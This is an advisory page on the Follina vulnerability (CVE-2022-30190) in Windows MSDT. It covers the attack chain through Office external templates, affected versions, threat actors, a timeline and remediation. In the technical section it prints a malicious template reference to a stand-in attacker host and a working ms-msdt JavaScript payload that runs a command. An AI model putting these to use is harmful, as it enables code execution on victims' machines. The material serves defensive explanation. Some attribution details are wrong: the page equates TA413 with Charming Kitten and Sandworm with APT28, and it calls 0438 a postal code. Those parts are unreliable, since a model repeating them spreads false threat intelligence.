CVE-2022-30190

Overview

Actively Exploited. This vulnerability has been added to CISA's Known Exploited Vulnerabilities (KEV) Catalog on June 14, 2022 with a remediation deadline of July 5, 2022. Federal agencies are required to apply mitigations per BOD 22-01.

CVE-2022-30190, nicknamed "Follina," is a remote code execution vulnerability in the Windows Microsoft Support Diagnostic Tool (MSDT). When Microsoft Word opens a document containing an external template reference to an attacker-controlled server, Word fetches an HTML file that triggers the ms-msdt:// URL protocol handler. This invokes MSDT with attacker-controlled arguments, allowing arbitrary command execution — without macros, without Protected View bypass, and without administrative privileges.

Follina was actively exploited as a zero-day for at least six weeks before Microsoft released a patch, with confirmed campaigns by Chinese APT groups (including TA413/Charming Kitten) and Russian threat actors. Its significance lies in bypassing the standard macro-based phishing defenses that organizations had spent years building: the attack works even when macros are entirely disabled.

What Is Microsoft Support Diagnostic Tool (MSDT)?

MSDT is a Windows built-in utility that collects diagnostic information and sends it to Microsoft support. It registers the ms-msdt:// URI scheme, allowing Windows to invoke MSDT from URLs and protocol handlers in applications. MSDT can execute PowerShell commands as part of its diagnostic collection — a capability that becomes a remote code execution primitive when it can be triggered with attacker-controlled arguments.

Affected Versions

Product	Vulnerable	Notes
Microsoft Office 2013	Yes	All update levels prior to June 2022
Microsoft Office 2016	Yes	All update levels prior to June 2022
Microsoft Office 2019	Yes	All update levels prior to June 2022
Microsoft Office LTSC 2021	Yes	All update levels prior to June 2022
Microsoft 365 Apps	Yes	All versions prior to June 2022 update
Windows itself	Yes	MSDT URL handler must be present; all Windows versions with MSDT

Patched in the June 14, 2022 Patch Tuesday update. The vulnerability exists in Windows MSDT itself; Office is the delivery vehicle.

Technical Details

Root Cause: MSDT URL Handler Invoked via Office External Template Reference

Microsoft Word supports external template references — a feature allowing a document to load a template from a URL when opened. The attack chain:

A malicious .docx or .rtf file contains a reference to an attacker-controlled URL in its word/_rels/document.xml.rels file:
```
<Relationship Type=".../attachedTemplate" Target="http://attacker.com/evil.html" TargetMode="External"/>
```
Word fetches the external resource from the attacker's server. The server returns an HTML file.

The HTML file contains an ms-msdt:// URL, invoking the MSDT protocol handler:

<script>window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_SelectProgram=NotListed IT_BrowseForFile=/../../$(cmd /c 'calc.exe')/.exe\""; </script>

Windows invokes MSDT with the attacker-supplied parameters. MSDT's PCWDiagnostic troubleshooter processes the parameters and executes the embedded command via PowerShell.

The code execution occurs as the user running Word — typically the logged-in user — with no macro execution, no macro warning dialog, and no bypass of Protected View required (for the .docx variant; the .rtf variant bypasses Protected View entirely).

Why Macros-Off Doesn't Prevent This

Traditional Office phishing attacks require the user to enable macros, which Microsoft and IT security teams have worked for years to prevent via Group Policy, user training, and default-block settings. Follina uses a completely different code path — Office's template fetching feature — which is not controlled by macro settings. An organization that has successfully eliminated macro-enabled document risk is still fully exposed to Follina via normal .docx and .rtf files.

RTF Variant: No Click Required

The .rtf variant of the attack is particularly dangerous: RTF files invoke the external template loading automatically when previewed in Windows Explorer's Preview Pane — without the user opening the file. Simply navigating to a folder containing the malicious .rtf triggers execution.

Attack Characteristics

Attribute	Detail
Attack Vector	Local (CVSS) — practical delivery is via email/web as a document
User Interaction	Required — user must open the document (or preview an RTF)
Macros Required	No — works with macros completely disabled
Protected View Bypass	Not required for `.docx`; automatic for `.rtf` in Preview Pane
Execution Context	Runs as the current user — unprivileged but immediately useful for lateral movement

Discovery

The technique was first observed in the wild in a malicious document from April 12, 2022 (later attributed to Sandworm/APT28 targeting users in Russia/Belarus). nao_sec (Japanese security researcher) discovered and tweeted about a suspicious Word document sample on May 27, 2022. Kevin Beaumont (security researcher, formerly of Microsoft) quickly analyzed the technique, recognized its significance, published a detailed breakdown, and coined the name "Follina" — after the postal code 0438 embedded in the malicious document sample. Microsoft acknowledged the zero-day on May 30, 2022, publishing a registry workaround while working on a patch.

Exploitation Context

Follina was exploited by multiple threat actors during its zero-day window (April–June 2022):

TA413 / Charming Kitten (Chinese APT): Targeted Tibetan organizations using Follina-embedded .docx files
Sandworm / APT28 (Russian GRU): Earliest known exploitation (April 2022) targeting Belarus/Russia-adjacent targets
Qakbot operators: Delivered Qakbot malware via Follina as an initial access technique
Various ransomware affiliates: Incorporated Follina into phishing campaigns for initial access
State-sponsored campaigns: Multiple government advisories noted nation-state use
Ransomware use: Confirmed (ransomwareUse: true) — used as initial access in ransomware deployment chains

Remediation

CISA BOD 22-01 Deadline: July 5, 2022. Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.

Immediate Workaround (Pre-Patch)

Disable the MSDT URL handler by deleting the registry key:

reg delete HKEY_CLASSES_ROOT\ms-msdt /f

To restore after patching: reg add HKEY_CLASSES_ROOT\ms-msdt /ve /d "URL:ms-msdt" /f

Recommended Actions

Apply the June 14, 2022 Patch Tuesday update for all affected Office and Windows versions. Verify via winver and Windows Update history.
Apply the registry workaround above immediately if patching is delayed.
Disable the Preview Pane in Windows Explorer to prevent RTF auto-exploitation: View → Show/hide → Preview pane (off). Group Policy: User Configuration\Administrative Templates\Windows Components\File Explorer\Turn off Preview Pane.
Block Office from fetching external templates at the network layer — proxy/firewall rules preventing Office processes from fetching .html files from external URLs can break the delivery chain.
Disable MSDT entirely via Group Policy if your organization has no support use case: Computer Configuration\Administrative Templates\System\Troubleshooting and Diagnostics\Microsoft Support Diagnostic Tool\Turn off MSDT interactive communication with support provider.
Train users: Follina is delivered via documents. Standard phishing awareness (treat unexpected documents from external senders with suspicion) remains the first line of defense.

Property	Value
CVE ID	CVE-2022-30190
Vendor / Product	Microsoft — Windows
NVD Published	2022-06-01
NVD Last Modified	2025-10-30
CVSS 3.1 Score	7.8
CVSS 3.1 Vector	`CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H`
Severity	HIGH
CWE	CWE-610 — Externally Controlled Reference to a Resource in Another Sphere
CISA KEV Added	2022-06-14
CISA KEV Deadline	2022-07-05
Known Ransomware Use	⚠️ Yes

Date	Event
2022-04-12	Earliest known in-the-wild exploitation — malicious document targeting users in Belarus/Russia discovered (later attributed to Sandworm/APT28)
2022-05-27	nao_sec discovers suspicious Word document using the ms-msdt:// technique and tweets about it
2022-05-29	Kevin Beaumont analyzes the technique, names it 'Follina' (after postal code 0438 in the sample), and publishes detailed writeup
2022-05-30	Microsoft acknowledges the zero-day and publishes workaround (disable MSDT URL handler)
2022-06-01	CVE-2022-30190 published; multiple threat actor campaigns detected in the wild
2022-06-14	Microsoft releases patch (June 2022 Patch Tuesday); CISA KEV added
2022-07-05	CISA BOD 22-01 remediation deadline

Resource	Type
NVD — CVE-2022-30190	Vulnerability Database
CISA KEV Catalog Entry	US Government
Microsoft Security Response Center — CVE-2022-30190 (Follina)	Vendor Advisory
Follina — A Microsoft Office Code Execution Vulnerability (Kevin Beaumont)	Security Research
Follina PoC Generator — chvancooten	Security Research
BleepingComputer: Follina Microsoft Zero-Day Heavily Exploited Before Patch	Security Research
The Hacker News: Chinese Hackers Exploited New MS Office Zero-Day	Security Research
CWE-610 — Externally Controlled Reference to a Resource in Another Sphere	Weakness Classification